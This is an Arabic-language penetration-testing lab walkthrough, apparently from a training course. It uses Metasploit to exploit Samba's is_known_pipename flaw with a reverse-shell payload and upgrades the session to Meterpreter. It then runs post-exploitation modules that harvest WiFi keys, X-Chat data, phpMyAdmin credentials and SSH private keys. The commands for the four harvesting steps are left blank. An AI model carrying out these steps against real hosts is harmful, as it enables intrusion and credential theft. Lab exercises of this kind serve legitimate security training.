🧪 المختبر العملي 28 : مختبر ما بعد الاستغلال II (Linux Post Exploitation Lab II)

🎯 الهدف الأساسي: استكشاف وحدات Metasploit المتنوعة لما بعد الاستغلال على نظام Linux، والتي تهدف إلى جمع معلومات إضافية وحساسة مثل بيانات اعتماد WiFi، سجلات الدردشة، وبيانات اعتماد SSH.

🔧 الأدوات المستخدمة:

  • MSFconsole: واجهة Metasploit الرئيسية.

  • Exploit Module: أي وحدة استغلال تمنح صدفة أوامر (مثلاً: unix/samba/is_known_pipename من .

  • Post-Exploitation Modules:

    • post/linux/gather/wifi_creds: لجمع بيانات اعتماد WiFi.

    • post/linux/gather/xchat_creds: لجمع بيانات اعتماد X-Chat.

    • post/multi/gather/phpmyadmin_cred_dump: لجمع بيانات اعتماد PHPMyAdmin.

    • post/linux/gather/ssh_creds: لجمع بيانات اعتماد SSH.

📜 خطوات التنفيذ:

📊 مرحلة الاستغلال (Exploitation) - الحصول على وصول أولي

  1. 🚀 بدء تشغيل MSFconsole والحصول على صدفة أوامر (أو Meterpreter):

    • ابدأ msfconsole:

      msfconsole -q
    • حدد عنوان IP للهدف.

    • 🔑 استخدام وحدة استغلال Samba للحصول على صدفة أوامر:

      use exploit/unix/samba/is_known_pipename
      set RHOSTS [Target_IP_Address]
      set LHOST [Your_Kali_IP_Address]
      set LPORT 4444
      set PAYLOAD cmd/unix/reverse_netcat # أو cmd/unix/reverse_bash
      exploit
    • إذا نفذت هذه الأوامر بنجاح، ستفتح جلسة Command shell session 1 opened.

    • 🔧 ترقية الجلسة إلى Meterpreter (موصى به):

      • أرسل الجلسة إلى الخلفية: background

      • استخدم وحدة post/multi/manage/shell_to_meterpreter:

        use post/multi/manage/shell_to_meterpreter
        set SESSION 1
        set LHOST [Your_Kali_IP_Address]
        set LPORT 4445
        run
      • ادخل إلى جلسة Meterpreter الجديدة (جلسة 2): sessions 2.

      • تأكد أنك root أو لديك صلاحيات كافية (إذا لم تكن root، ستحتاج إلى رفع الصلاحيات قبل المتابعة).

📊 مرحلة ما بعد الاستغلال: جمع المعلومات الحساسة

  1. 💡 جمع بيانات اعتماد WiFi باستخدام post/linux/gather/wifi_creds:

    • أرسل جلسة Meterpreter إلى الخلفية:

    • 🔑 استخدام الوحدة:

    • ⚙️ تعيين الخيارات:

    • 🚀 تشغيل الوحدة:

    • إذا نفذت هذا الأمر، ستقوم الوحدة بجمع وعرض بيانات اعتماد WiFi المتصل بها النظام المستهدف (SSID و Pre-Shared Key).

  2. 💡 جمع بيانات اعتماد X-Chat باستخدام post/linux/gather/xchat_creds:

    • 🔧 الرجوع واستخدام الوحدة:

    • ⚙️ تعيين الخيارات:

    • 🚀 تشغيل الوحدة:

    • إذا نفذت هذا الأمر، ستقوم الوحدة بجمع معلومات حول تكوينات X-Chat وسجلاتها.

  3. 💡 جمع بيانات اعتماد PHPMyAdmin باستخدام post/multi/gather/phpmyadmin_cred_dump:

    • 🔧 الرجوع واستخدام الوحدة:

    • ⚙️ تعيين الخيارات:

    • 🚀 تشغيل الوحدة:

    • إذا نفذت هذا الأمر، ستقوم الوحدة بمحاولة استخراج بيانات اعتماد PHPMyAdmin (إذا كان مثبتًا على النظام المستهدف).

  4. 💡 جمع بيانات اعتماد SSH (مفاتيح خاصة) باستخدام post/linux/gather/ssh_creds:

    • 🔧 الرجوع واستخدام الوحدة:

    • ⚙️ تعيين الخيارات:

    • 🚀 تشغيل الوحدة:

    • إذا نفذت هذا الأمر، ستقوم الوحدة بجمع وعرض معلومات حول مفاتيح SSH الخاصة المخزنة على النظام المستهدف. 🔗 ربط سلسلة الأدوات: هذه المفاتيح يمكن استخدامها لتسجيل الدخول إلى النظام (أو أنظمة أخرى) دون الحاجة إلى كلمات مرور.

نقاط التحقق:

  • يجب الحصول على جلسة Meterpreter بصلاحيات root.

  • يجب أن تتمكن من جمع بيانات اعتماد WiFi.

  • يجب أن تتمكن من جمع معلومات X-Chat.

  • يجب أن تتمكن من جمع بيانات اعتماد PHPMyAdmin (إن وجدت).

  • يجب أن تتمكن من جمع مفاتيح SSH الخاصة.

Last updated